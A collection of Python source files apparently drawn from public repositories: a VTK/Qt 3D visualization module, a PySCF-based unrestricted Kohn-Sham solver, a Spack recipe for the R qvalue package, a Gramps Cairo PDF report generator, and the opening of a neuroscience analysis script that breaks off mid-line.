self._blockSignals: if self.onTransformModifiedCallback: self.onTransformModifiedCallback(self) self.callbacks.process('FrameModified', self) def _createAxes(self, scale, useTube): axes = vtk.vtkAxes() axes.SetComputeNormals(0) axes.SetScaleFactor(scale) axes.Update() if useTube: tube = vtk.vtkTubeFilter() tube.SetInput(axes.GetOutput()) tube.SetRadius(0.002) tube.SetNumberOfSides(12) tube.Update() axes = tube return shallowCopy(axes.GetOutput()) def addToView(self, view): PolyDataItem.addToView(self, view) def copyFrame(self, transform): self._blockSignals = True self.transform.SetMatrix(transform.GetMatrix()) self._blockSignals = False self.transform.Modified() parent = self.parent() if (parent and parent.getProperty('Visible')) or self.getProperty('Visible'): self._renderAllViews() def getFrameSync(self): if self._frameSync is None: self._frameSync = FrameSync() self._frameSync.addFrame(self) return self._frameSync def _updateAxesGeometry(self): scale = self.getProperty('Scale') self.rep.SetWorldSize(scale) self.setPolyData(self._createAxes(scale, self.getProperty('Tube'))) def _onPropertyChanged(self, propertySet, propertyName): PolyDataItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Scale': scale = self.getProperty(propertyName) self.rep.SetWorldSize(scale) self._updateAxesGeometry() elif propertyName == 'Edit': view = app.getCurrentRenderView() if view not in self.views: view = self.views[0] self.widget.SetInteractor(view.renderWindow().GetInteractor()) self.widget.SetEnabled(self.getProperty(propertyName)) isEditing = self.getProperty(propertyName) if isEditing: frameupdater.registerFrame(self) elif propertyName == 'Trace': trace = self.getProperty(propertyName) if trace and not self.traceData: self.traceData = FrameTraceVisualizer(self) elif not trace and self.traceData: om.removeFromObjectModel(self.traceData.getTraceData()) self.traceData = None elif propertyName == 'Tube': self._updateAxesGeometry() def onRemoveFromObjectModel(self): PolyDataItem.onRemoveFromObjectModel(self) self.transform.RemoveObserver(self.observerTag) self.widget.SetInteractor(None) self.widget.EnabledOff() for view in self.views: view.renderer().RemoveActor(self.actor) view.render() class FrameTraceVisualizer(object): def __init__(self, frame): self.frame = frame self.traceName = '%s trace' % frame.getProperty('Name') self.lastPosition = np.array(frame.transform.GetPosition()) self.lineCell = vtk.vtkLine() frame.connectFrameModified(self.onFrameModified) def getTraceData(self): t = self.frame.findChild(self.traceName) if not t: pts = vtk.vtkPoints() pts.SetDataTypeToDouble() pts.InsertNextPoint(self.frame.transform.GetPosition()) pd = vtk.vtkPolyData() pd.SetPoints(pts) pd.SetLines(vtk.vtkCellArray()) t = showPolyData(pd, self.traceName, parent=self.frame) return t def addPoint(self, point): traceData = self.getTraceData() pd = traceData.polyData pd.GetPoints().InsertNextPoint(point) numberOfPoints = pd.GetNumberOfPoints() line = self.lineCell ids = line.GetPointIds() ids.SetId(0, numberOfPoints-2) ids.SetId(1, numberOfPoints-1) pd.GetLines().InsertNextCell(line.GetPointIds()) pd.Modified() traceData._renderAllViews() def onFrameModified(self, frame): position = np.array(frame.transform.GetPosition()) if not np.allclose(position, self.lastPosition): self.addPoint(position) class FrameSync(object): class FrameData(object): def __init__(self, **kwargs): self.__dict__.update(kwargs) def __init__(self): self.frames = {} self._blockCallbacks = False self._ids = itertools.count() def addFrame(self, frame, ignoreIncoming=False): if frame is None: return if self._findFrameId(frame) is not None: return frameId = self._ids.next() callbackId = frame.connectFrameModified(self._onFrameModified) self.frames[frameId] = FrameSync.FrameData( ref=weakref.ref(frame), baseTransform=self._computeBaseTransform(frame), callbackId=callbackId, ignoreIncoming=ignoreIncoming) def removeFrame(self, frame): frameId = self._findFrameId(frame) if frameId is None: raise KeyError(frame) frame.disconnectFrameModified(self.frames[frameId].callbackId) self._removeFrameId(frameId) def _computeBaseTransform(self, frame): currentDelta = None for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameData.ref() is frame: continue else: currentDelta = transformUtils.copyFrame(frameData.baseTransform.GetLinearInverse()) currentDelta.Concatenate(transformUtils.copyFrame(frameData.ref().transform)) break t = transformUtils.copyFrame(frame.transform) t.PostMultiply() if currentDelta: t.Concatenate(currentDelta.GetLinearInverse()) return t def _removeFrameId(self, frameId): del self.frames[frameId] def _findFrameId(self, frame): for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameData.ref() is frame: return frameId def _moveFrame(self, frameId, modifiedFrameId): frameData = self.frames[frameId] modifiedFrameData = self.frames[modifiedFrameId] t = vtk.vtkTransform() t.PostMultiply() t.Concatenate(frameData.baseTransform) t.Concatenate(modifiedFrameData.baseTransform.GetLinearInverse()) t.Concatenate(modifiedFrameData.ref().transform) frameData.ref().copyFrame(t) def _onFrameModified(self, frame): if self._blockCallbacks: return modifiedFrameId = self._findFrameId(frame) assert modifiedFrameId is not None #print self, 'onFrameModified:', self.frames[modifiedFrameId].ref().getProperty('Name') if self.frames[modifiedFrameId].ignoreIncoming: self.frames[modifiedFrameId].baseTransform = self._computeBaseTransform(frame) return self._blockCallbacks = True for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameId != modifiedFrameId: #print ' ', self, 'moving:', self.frames[frameId].ref().getProperty('Name') self._moveFrame(frameId, modifiedFrameId) self._blockCallbacks = False class ViewOptionsItem(om.ObjectModelItem): def __init__(self, view): om.ObjectModelItem.__init__(self, 'view options') self.view = view self.addProperty('Camera projection', 0, attributes=om.PropertyAttributes(enumNames=['Perspective', 'Parallel'])) self.addProperty('View angle', view.camera().GetViewAngle(), attributes=om.PropertyAttributes(minimum=2, maximum=180)) self.addProperty('Key light intensity', view.lightKit().GetKeyLightIntensity(), attributes=om.PropertyAttributes(minimum=0, maximum=5, singleStep=0.1, decimals=2)) self.addProperty('Light kit', True) self.addProperty('Eye dome lighting', False) self.addProperty('Orientation widget', True) self.addProperty('Interactive render', True) self.addProperty('Gradient background', True) self.addProperty('Background color', view.backgroundRenderer().GetBackground()) self.addProperty('Background color 2', view.backgroundRenderer().GetBackground2()) def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName in ('Gradient background', 'Background color', 'Background color 2'): colors = [self.getProperty('Background color'), self.getProperty('Background color 2')] if not self.getProperty('Gradient background'): colors[1] = colors[0] self.view.renderer().SetBackground(colors[0]) self.view.renderer().SetBackground2(colors[1]) elif propertyName == 'Camera projection': if self.getPropertyEnumValue(propertyName) == 'Perspective': self.view.camera().ParallelProjectionOff() else: self.view.camera().ParallelProjectionOn() elif propertyName == 'Orientation widget': if self.getProperty(propertyName): self.view.orientationMarkerWidget().On() else: self.view.orientationMarkerWidget().Off() elif propertyName == 'View angle': angle = self.getProperty(propertyName) self.view.camera().SetViewAngle(angle) elif propertyName == 'Key light intensity': intensity = self.getProperty(propertyName) self.view.lightKit().SetKeyLightIntensity(intensity) elif propertyName == 'Light kit': self.view.setLightKitEnabled(self.getProperty(propertyName)) elif propertyName == 'Eye dome lighting': if self.getProperty(propertyName): enableEyeDomeLighting(self.view) else: disableEyeDomeLighting(self.view) elif propertyName == 'Interactive render': if self.getProperty(propertyName): self.view.renderWindow().GetInteractor().EnableRenderOn() else: self.view.renderWindow().GetInteractor().EnableRenderOff() self.view.render() def showGrid(view, cellSize=0.5, numberOfCells=25, name='grid', parent='sensors', color=[1,1,1], alpha=0.05, gridTransform=None): grid = vtk.vtkGridSource() grid.SetScale(cellSize) grid.SetGridSize(numberOfCells) grid.SetSurfaceEnabled(True) grid.Update() gridObj = showPolyData(grid.GetOutput(), 'grid', view=view, alpha=alpha, color=color, visible=True, parent=parent) gridObj.gridSource = grid gridObj.actor.GetProperty().LightingOff() gridObj.actor.SetPickable(False) gridTransform = gridTransform or vtk.vtkTransform() gridObj.actor.SetUserTransform(gridTransform) showFrame(gridTransform, 'grid frame', scale=0.2, visible=False, parent=gridObj, view=view) gridObj.setProperty('Surface Mode', 'Wireframe') def computeViewBoundsNoGrid(): if not gridObj.getProperty('Visible'): return gridObj.actor.SetUseBounds(False) bounds = view.renderer().ComputeVisiblePropBounds() gridObj.actor.SetUseBounds(True) if vtk.vtkMath.AreBoundsInitialized(bounds): view.addCustomBounds(bounds) else: view.addCustomBounds([-1, 1, -1, 1, -1, 1]) view.connect('computeBoundsRequest(ddQVTKWidgetView*)', computeViewBoundsNoGrid) return gridObj def createScalarBarWidget(view, lookupTable, title): w = vtk.vtkScalarBarWidget() bar = w.GetScalarBarActor() bar.SetTitle(title) bar.SetLookupTable(lookupTable) w.SetRepositionable(True) w.SetInteractor(view.renderWindow().GetInteractor()) w.On() rep = w.GetRepresentation() rep.SetOrientation(0) rep.SetPosition(0.77, 0.92) rep.SetPosition2(0.20, 0.07) return w def updatePolyData(polyData, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showPolyData(polyData, name, **kwargs) obj.setPolyData(polyData) return obj def updateFrame(frame, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showFrame(frame, name, **kwargs) obj.copyFrame(frame) return obj def showFrame(frame, name, view=None, parent='segmentation', scale=0.35, visible=True): view = view or app.getCurrentRenderView() assert view if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent item = FrameItem(name, frame, view) om.addToObjectModel(item, parentObj) item.setProperty('Visible', visible) item.setProperty('Scale', scale) return item def showPolyData(polyData, name, color=None, colorByName=None, colorByRange=None, alpha=1.0, visible=True, view=None, parent='segmentation', cls=None): view = view or app.getCurrentRenderView() assert view cls = cls or PolyDataItem item = cls(name, polyData, view) if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent om.addToObjectModel(item, parentObj) item.setProperty('Visible', visible) item.setProperty('Alpha', alpha) if colorByName and colorByName not in item.getArrayNames(): print 'showPolyData(colorByName=%s): array not found' % colorByName colorByName = None if colorByName: item.setProperty('Color By', colorByName) item.colorBy(colorByName, colorByRange) else: color = [1.0, 1.0, 1.0] if color is None else color item.setProperty('Color', [float(c) for c in color]) item.colorBy(None) return item def addChildFrame(obj, initialTransform=None): ''' Adds a child frame to the given PolyDataItem. If initialTransform is given, the object's polydata is transformed using the inverse of initialTransform and then a child frame is assigned to the object to maintain its original position. ''' if obj.getChildFrame(): return if initialTransform: pd = transformPolyData(obj.polyData, initialTransform.GetLinearInverse()) obj.setPolyData(pd) t = obj.actor.GetUserTransform() if t is None: t = vtk.vtkTransform() t.PostMultiply() frame = showFrame(t, obj.getProperty('Name') + ' frame', parent=obj, scale=0.2, visible=False) obj.actor.SetUserTransform(t) return frame def getRandomColor(): ''' Return a random color as a list of RGB values between 0.0 and 1.0. ''' return colorsys.hsv_to_rgb(np.random.rand(), 1.0, 0.9) def showClusterObjects(clusters, parent): colors = [ QtCore.Qt.red, QtCore.Qt.blue, QtCore.Qt.yellow, QtCore.Qt.green, QtCore.Qt.magenta, QtCore.Qt.cyan, QtCore.Qt.darkCyan, QtCore.Qt.darkGreen, QtCore.Qt.darkMagenta ] colors = [QtGui.QColor(c) for c in colors] colors = [(c.red()/255.0, c.green()/255.0, c.blue()/255.0) for c in colors] objects = [] for i, cluster in enumerate(clusters): name = 'object %d' % i color = colors[i % len(colors)] clusterObj = showPolyData(cluster.mesh, name, color=color, parent=parent, alpha=1.0) clusterFrame = showFrame(cluster.frame, name + ' frame', scale=0.2, visible=False, parent=clusterObj) clusterBox = showPolyData(cluster.box, name + ' box', color=color, parent=clusterObj, alpha=0.6, visible=False) clusterPoints = showPolyData(cluster.points, name + ' points', color=color, parent=clusterObj, visible=False, alpha=1.0) if hasattr(cluster,'oriented_frame'): orientedFrame = showFrame(cluster.oriented_frame, name + ' oriented frame', scale=0.2, visible=False, parent=clusterObj) clusterPoints.setProperty('Point Size', 7) clusterPoints.colorBy(None) clusterObj.data = cluster objects.append(clusterObj) for obj in [clusterObj, clusterBox, clusterPoints]: obj.actor.SetUserTransform(cluster.frame) return objects captionWidget = None def hideCaptionWidget(): global captionWidget if captionWidget is not None: captionWidget.Off() captionWidget.Render() def showCaptionWidget(position, text, view=None): view = view or app.getCurrentRenderView() assert view global captionWidget if not captionWidget: rep = vtk.vtkCaptionRepresentation() rep.SetPosition(0.2, 0.8) w = vtk.vtkCaptionWidget() w.SetInteractor(view.renderWindow().GetInteractor()) w.SetRepresentation(rep) w.On() captionWidget = w rep = captionWidget.GetRepresentation() rep.SetAnchorPosition(position) rep.GetCaptionActor2D().SetCaption(text) a = rep.GetCaptionActor2D() pr = a.GetTextActor().GetTextProperty() pr.SetJustificationToCentered() pr.SetVerticalJustificationToCentered() pr.SetItalic(0) pr.SetBold(0) pr.SetShadow(0) pr.SetFontFamilyToArial() c2 = rep.GetPosition2Coordinate() c2.SetCoordinateSystemToDisplay() c2.SetValue(12*len(text),30) # disable border #rep.SetShowBorder(0) a.SetThreeDimensionalLeader(0) a.SetLeaderGlyphSize(0.005) captionWidget.On() captionWidget.Render() def getRayFromDisplayPoint(view, displayPoint): ''' Given a view and an XY display point, returns two XYZ world points which are the display point at the near/far clipping planes of the view. ''' worldPt1 = [0,0,0,0] worldPt2 = [0,0,0,0] renderer = view.renderer() vtk.vtkInteractorObserver.ComputeDisplayToWorld(renderer, displayPoint[0], displayPoint[1], 0, worldPt1) vtk.vtkInteractorObserver.ComputeDisplayToWorld(renderer, displayPoint[0], displayPoint[1], 1, worldPt2) worldPt1 = np.array(worldPt1[:3]) worldPt2 = np.array(worldPt2[:3]) return worldPt1, worldPt2 def pickImage(displayPoint, view, obj=None): picker = vtk.vtkCellPicker() if isinstance(obj, str): obj = om.findObjectByName(obj) assert obj if obj: picker.AddPickList(obj.actor) picker.PickFromListOn() picker.Pick(displayPoint[0], displayPoint[1], 0, view.renderer()) pickedDataset = picker.GetDataSet() if obj: return picker.GetPointIJK() else: return pickedDataset, picker.GetPointIJK() def pickProp(displayPoint, view): for tolerance in (0.0, 0.005, 0.01): pickType = 'render' if tolerance == 0.0 else 'cells' pickedPoint, pickedProp, pickedDataset = pickPoint(displayPoint, view, pickType=pickType, tolerance=tolerance) if pickedProp is not None: return pickedPoint, pickedProp, pickedDataset return None, None, None def pickPoint(displayPoint, view, obj=None, pickType='points', tolerance=0.01, returnNormal=False): assert pickType in ('points', 'cells', 'render') view = view or app.getCurrentRenderView() assert view if isinstance(obj, str): obj = om.findObjectByName(obj) assert obj if pickType == 'render': picker = vtk.vtkPropPicker() else: picker = vtk.vtkPointPicker() if pickType == 'points' else vtk.vtkCellPicker() picker.SetTolerance(tolerance) if obj is not None: if isinstance(obj, list): for o in obj: picker.AddPickList(o.actor) obj = None else: picker.AddPickList(obj.actor) picker.PickFromListOn() picker.Pick(displayPoint[0], displayPoint[1], 0, view.renderer()) pickedProp = picker.GetViewProp() pickedPoint = np.array(picker.GetPickPosition()) pickedDataset = pickedProp.GetMapper().GetInput() if isinstance(pickedProp, vtk.vtkActor) else None pickedNormal = np.zeros(3) if returnNormal: if pickType == 'cells': pickedNormal = np.array(picker.GetPickNormal()) elif pickType == 'points' and pickedDataset: pointId = picker.GetPointId() normals = pickedDataset.GetPointData().GetNormals() if normals: pickedNormal = np.array(normals.GetTuple3(pointId)) #if pickedDataset and pickType == 'cells': # print 'point id:', pickedDataset.GetCell(picker.GetCellId()).GetPointIds().GetId(picker.GetSubId()) #if pickType == 'points': # print 'point id:', picker.GetPointId() if obj: if returnNormal: return (pickedPoint, pickedNormal) if pickedProp else (None, None) else: return pickedPoint if pickedProp else None else: return (pickedPoint, pickedProp, pickedDataset, pickedNormal) if returnNormal else (pickedPoint, pickedProp, pickedDataset) def mapMousePosition(widget, mouseEvent): mousePosition = mouseEvent.pos() return mousePosition.x(), widget.height - mousePosition.y() def getObjectByDataSet(polyData): for obj in om.getObjects(): if obj.hasDataSet(polyData): return obj def getObjectByProp(prop): if not prop: return None for obj in om.getObjects(): if isinstance(obj, FrameItem) and obj.widget.GetRepresentation() == prop: return obj if isinstance(prop, vtk.vtkActor): return getObjectByDataSet(prop.GetMapper().GetInput()) def findPickedObject(displayPoint, view): pickedPoint, pickedProp, pickedDataset = pickProp(displayPoint, view) obj = getObjectByProp(pickedProp) return obj, pickedPoint def enableEyeDomeLighting(view): seq = vtk.vtkSequencePass() opaque = vtk.vtkOpaquePass() peeling = vtk.vtkDepthPeelingPass() peeling.SetMaximumNumberOfPeels(200) peeling.SetOcclusionRatio(0.1) translucent = vtk.vtkTranslucentPass() peeling.SetTranslucentPass(translucent) volume = vtk.vtkVolumetricPass() overlay = vtk.vtkOverlayPass() lights = vtk.vtkLightsPass() passes=vtk.vtkRenderPassCollection() passes.AddItem(lights) passes.AddItem(opaque) #passes.AddItem(peeling) passes.AddItem(translucent) #passes.AddItem(volume) #passes.AddItem(overlay) seq.SetPasses(passes) edlPass = vtk.vtkEDLShading() cameraPass = vtk.vtkCameraPass() edlPass.SetDelegatePass(cameraPass) cameraPass.SetDelegatePass(seq) view.renderer().SetPass(edlPass) def disableEyeDomeLighting(view): view.renderer().SetPass(None) def showImage(filename): ''' Returns a QLabel displaying the image contents of given filename. Make sure to assign the label, it will destruct when it goes out of scope. ''' image = QtGui.QImage(filename) assert not image.isNull() imageLabel = QtGui.QLabel() imageLabel.setPixmap(QtGui.QPixmap.fromImage(image)) imageLabel.setScaledContents(True) imageLabel.resize(imageLabel.pixmap.size()) imageLabel.setWindowTitle(os.path.basename(filename)) imageLabel.show()
mitdrc/director
src/python/director/visualization.py
Python
bsd-3-clause
39,111
[ "VTK" ]
16d101cec27805d7033d112846c8514e6712609a5aad326bb0775a2dfd50fddf
""" UKS via SGM """ import numpy as np from frankenstein.tools.tensor_utils import get_unitary_matrix_ov from pyscf import scf from frankenstein.sgscf import uks, sguhf def update_sghf(mf): pass class SGUKS(uks.UKS): # methods for output print_info = sguhf.print_info # methods for SCF update_sghf = update_sghf get_grad_L = sguhf.get_grad_L update_all = sguhf.update_all # methods for err/conv check check_conv = sguhf.check_conv # methods for GDM get_value_gdm = sguhf.get_value_gdm get_grad_gdm = sguhf.get_grad_gdm get_prec = sguhf.get_prec def __init__(self, pymol): uks.UKS.__init__(self, pymol) self.orb_swap = None self.fd_grad = True # not supported for xc for now self.grad_L = None @property def L(self): grad_E = self.get_grad_E() if self.grad_E is None else self.grad_E return np.sum([grad_E[s].ravel()@grad_E[s].ravel() for s in [0,1]]) @property def err_grad_L(self): grad_L = self.get_grad_L() if self.grad_L is None else self.grad_L return np.sum([np.mean(grad_L[s]**2.) for s in [0,1]])**0.5 if __name__ == "__main__": import sys try: geom = sys.argv[1] basis = sys.argv[2] xc = sys.argv[3] ii = int(sys.argv[4]) aa = int(sys.argv[5]) except: print("Usage: geom, basis, xc, ii, aa") sys.exit(1) from frankenstein.tools.pyscf_utils import get_pymol pymol = get_pymol(geom, basis, verbose=3) from frankenstein.sgscf import rks rmf = rks.RKS(pymol) rmf.xc = xc rmf.kernel() C0 = np.asarray([rmf.mo_coeff.copy(), rmf.mo_coeff.copy()]) mf = SGUKS(pymol) mf.xc = xc mf.orb_swap = [[[mf.no[0]-1-ii,mf.no[0]-1+aa]],[]] mf.kernel(mo_coeff0=C0.copy()) mf.analyze(C0) eex = (mf.e_tot - rmf.e_tot) * 27.211399 print("Eex (%s) = %.3f eV" % (xc, eex)) mu, f = rmf.get_tdm(mf) print("T.D.M. = " + ("{:.4f} "*3).format(*mu)) print("Osc. strg = %.6f" % (f))
hongzhouye/frankenstein
sgscf/sguks.py
Python
bsd-3-clause
2,061
[ "PyMOL", "PySCF" ]
75b433a219b2a3950b0a2d1bffdf900b57911fe6434167478cdc34ecf15f61e4
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class RQvalue(RPackage): """Q-value estimation for false discovery rate control. This package takes a list of p-values resulting from the simultaneous testing of many hypotheses and estimates their q-values and local FDR values. The q-value of a test measures the proportion of false positives incurred (called the false discovery rate) when that particular test is called significant. The local FDR measures the posterior probability the null hypothesis is true given the test's p-value. Various plots are automatically generated, allowing one to make sensible significance cut- offs. Several mathematical results have recently been shown on the conservative accuracy of the estimated q-values from this software. The software can be applied to problems in genomics, brain imaging, astrophysics, and data mining.""" homepage = "https://bioconductor.org/packages/qvalue" git = "https://git.bioconductor.org/packages/qvalue.git" version('2.16.0', commit='5efbe20ef522a45a7a04b681f72bb9a12e2747ae') version('2.14.1', commit='b694e4b264f25250eb1d1115e70c07f65767c20e') version('2.12.0', commit='7df64ebfcbe69dcbf8b88cb6ef0068bf16979673') version('2.10.0', commit='581e5664b4356440a96310897398f01a98ceb81b') version('2.8.0', commit='c7bf3315619d42d800f57a36670c25a7495ded72') depends_on('r@2.10:', type=('build', 'run')) depends_on('r-ggplot2', type=('build', 'run')) depends_on('r-reshape2', type=('build', 'run'))
rspavel/spack
var/spack/repos/builtin/packages/r-qvalue/package.py
Python
lgpl-2.1
1,762
[ "Bioconductor" ]
e9fd8eb7e32a3217314dd441cdf8af49c6c4baf0ef67cc7afcbc28c305fcff44
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2007 Zsolt Foldvari # Copyright (C) 2008 Brian G. Matherly # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # $Id$ """PDF output generator based on Cairo. """ #------------------------------------------------------------------------ # # Python modules # #------------------------------------------------------------------------ from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.get_translation().gettext import sys #------------------------------------------------------------------------ # # Gramps modules # #------------------------------------------------------------------------ import gramps.plugins.lib.libcairodoc as libcairodoc from gramps.gen.plug.docgen import INDEX_TYPE_ALP, INDEX_TYPE_TOC from gramps.gen.errors import ReportError #------------------------------------------------------------------------ # # Set up logging # #------------------------------------------------------------------------ import logging LOG = logging.getLogger(".PdfDoc") #------------------------------------------------------------------------- # # GTK modules # #------------------------------------------------------------------------- from gi.repository import Pango, PangoCairo import cairo #------------------------------------------------------------------------ # # Constants # #------------------------------------------------------------------------ # resolution DPI = 72.0 #------------------------------------------------------------------------ # # PdfDoc class # #------------------------------------------------------------------------ class PdfDoc(libcairodoc.CairoDoc): """Render the document into PDF file using Cairo. """ def run(self): """Create the PDF output. """ # get paper dimensions paper_width = self.paper.get_size().get_width() * DPI / 2.54 paper_height = self.paper.get_size().get_height() * DPI / 2.54 page_width = round(self.paper.get_usable_width() * DPI / 2.54) page_height = round(self.paper.get_usable_height() * DPI / 2.54) left_margin = self.paper.get_left_margin() * DPI / 2.54 top_margin = self.paper.get_top_margin() * DPI / 2.54 # create cairo context and pango layout filename = self._backend.filename if sys.version_info[0] < 3: filename = self._backend.filename.encode(glocale.getfilesystemencoding()) try: surface = cairo.PDFSurface(filename, paper_width, paper_height) except IOError as msg: errmsg = "%s\n%s" % (_("Could not create %s") % filename, msg) raise ReportError(errmsg) except Exception as err: errmsg = "%s\n%s" % (_("Could not create %s") % filename, err) raise ReportError(errmsg) surface.set_fallback_resolution(300, 300) cr = cairo.Context(surface) fontmap = PangoCairo.font_map_new() fontmap.set_resolution(DPI) pango_context = fontmap.create_context() options = cairo.FontOptions() options.set_hint_metrics(cairo.HINT_METRICS_OFF) PangoCairo.context_set_font_options(pango_context, options) layout = Pango.Layout(pango_context) PangoCairo.update_context(cr, pango_context) # paginate the document self.paginate_document(layout, page_width, page_height, DPI, DPI) body_pages = self._pages # build the table of contents and alphabetical index toc_page = None index_page = None toc = [] index = {} for page_nr, page in enumerate(body_pages): if page.has_toc(): toc_page = page_nr if page.has_index(): index_page = page_nr for mark in page.get_marks(): if mark.type == INDEX_TYPE_ALP: if mark.key in index: if page_nr + 1 not in index[mark.key]: index[mark.key].append(page_nr + 1) else: index[mark.key] = [page_nr + 1] elif mark.type == INDEX_TYPE_TOC: toc.append([mark, page_nr + 1]) # paginate the table of contents rebuild_required = False if toc_page is not None: toc_pages = self.__generate_toc(layout, page_width, page_height, toc) offset = len(toc_pages) - 1 if offset > 0: self.__increment_pages(toc, index, toc_page, offset) rebuild_required = True else: toc_pages = [] # paginate the index if index_page is not None: index_pages = self.__generate_index(layout, page_width, page_height, index) offset = len(index_pages) - 1 if offset > 0: self.__increment_pages(toc, index, index_page, offset) rebuild_required = True else: index_pages = [] # rebuild the table of contents and index if required if rebuild_required: if toc_page is not None: toc_pages = self.__generate_toc(layout, page_width, page_height, toc) if index_page is not None: index_pages = self.__generate_index(layout, page_width, page_height, index) # render the pages if toc_page is not None: body_pages = body_pages[:toc_page] + toc_pages + \ body_pages[toc_page+1:] if index_page is not None: body_pages = body_pages[:index_page] + index_pages + \ body_pages[index_page+1:] self._pages = body_pages for page_nr in range(len(self._pages)): cr.save() cr.translate(left_margin, top_margin) self.draw_page(page_nr, cr, layout, page_width, page_height, DPI, DPI) cr.show_page() cr.restore() # close the surface (file) surface.finish() def __increment_pages(self, toc, index, start_page, offset): """ Increment the page numbers in the table of contents and index. """ for n, value in enumerate(toc): page_nr = toc[n][1] toc[n][1] = page_nr + (offset if page_nr > start_page else 0) for key, value in index.items(): index[key] = [page_nr + (offset if page_nr > start_page else 0) for page_nr in value] def __generate_toc(self, layout, page_width, page_height, toc): """ Generate the table of contents. """ self._doc = libcairodoc.GtkDocDocument() self._active_element = self._doc self._pages = [] write_toc(toc, self) self.paginate_document(layout, page_width, page_height, DPI, DPI) return self._pages def __generate_index(self, layout, page_width, page_height, index): """ Generate the index. """ self._doc = libcairodoc.GtkDocDocument() self._active_element = self._doc self._pages = [] write_index(index, self) self.paginate_document(layout, page_width, page_height, DPI, DPI) return self._pages def write_toc(toc, doc): """ Write the table of contents. """ if not toc: return doc.start_paragraph('TOC-Title') doc.write_text(_('Contents')) doc.end_paragraph() doc.start_table('toc', 'TOC-Table') for mark, page_nr in toc: doc.start_row() doc.start_cell('TOC-Cell') if mark.level == 1: style_name = "TOC-Heading1" elif mark.level == 2: style_name = "TOC-Heading2" else: style_name = "TOC-Heading3" doc.start_paragraph(style_name) doc.write_text(mark.key) doc.end_paragraph() doc.end_cell() doc.start_cell('TOC-Cell') doc.start_paragraph(style_name) doc.write_text(str(page_nr)) doc.end_paragraph() doc.end_cell() doc.end_row() doc.end_table() def write_index(index, doc): """ Write the alphabetical index. """ if not index: return doc.start_paragraph('IDX-Title') doc.write_text(_('Index')) doc.end_paragraph() doc.start_table('index', 'IDX-Table') for key in sorted(index.keys()): doc.start_row() doc.start_cell('IDX-Cell') doc.start_paragraph('IDX-Entry') doc.write_text(key) doc.end_paragraph() doc.end_cell() doc.start_cell('IDX-Cell') doc.start_paragraph('IDX-Entry') pages = [str(page_nr) for page_nr in index[key]] doc.write_text(', '.join(pages)) doc.end_paragraph() doc.end_cell() doc.end_row() doc.end_table()
Forage/Gramps
gramps/plugins/docgen/pdfdoc.py
Python
gpl-2.0
9,784
[ "Brian" ]
8a27c0e0990a6b162a5d9d96765d9f5e117e97d8ac85cb635819a5366bc153d5
#!/usr/bin/env python ''' File name: main_make_map.py Author: Guillaume Viejo Date created: 28/09/2017 Python Version: 3.5.2 To make shank mapping ''' import numpy as np import pandas as pd # from matplotlib.pyplot import plot,show,draw import scipy.io from functions import * from pylab import * from sklearn.decomposition import PCA import _pickle as cPickle ############################################################################################################### # LOADING DATA ############################################################################################################### data_directory = '/mnt/DataGuillaume/MergedData/' datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#') theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True) swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True) spind_mod, spind_ses = loadSpindMod('/mnt/DataGuillaume/MergedData/SPINDLE_mod.pickle', datasets, return_index=True) nbins = 400 binsize = 5 times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2 swr = pd.DataFrame( index = swr_ses, columns = times, data = swr_mod) phase = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) phase.loc[theta_ses['wake'],'theta_wake'] = theta_mod['wake'][:,0] phase.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,0] phase.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,0] phase.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,0] pvalue = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) pvalue.loc[theta_ses['wake'], 'theta_wake'] = theta_mod['wake'][:,1] pvalue.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,1] pvalue.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,1] pvalue.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,1] kappa = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) kappa.loc[theta_ses['wake'], 'theta_wake'] = theta_mod['wake'][:,2] kappa.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,2] kappa.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,2] kappa.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,2] # filtering swr_mod swr = pd.DataFrame( index = swr.index, columns = swr.columns, data = gaussFilt(swr.values, (10,))) # Cut swr_mod from -500 to 500 nbins = 200 binsize = 5 times = np.arange(0, 